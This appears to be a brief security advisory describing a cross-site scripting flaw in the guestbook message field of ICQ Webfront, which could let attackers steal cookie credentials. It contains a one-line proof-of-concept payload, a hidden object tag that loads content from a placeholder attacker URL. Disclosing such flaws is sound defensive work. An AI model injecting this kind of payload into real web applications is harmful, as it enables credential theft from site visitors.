It has been reported that ICQ Webfront is prone to a cross-site scripting vulnerability in the message field of the guestbook module. This issue is caused by improper sanitization of user-supplied data.
Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials from a user. Other attacks are possible as well.
<object style="display:none" data="http://www.example.com/bad.asp"></object>
Mirabilis ICQ Web Front contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the message variable upon submission to the guestbook. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.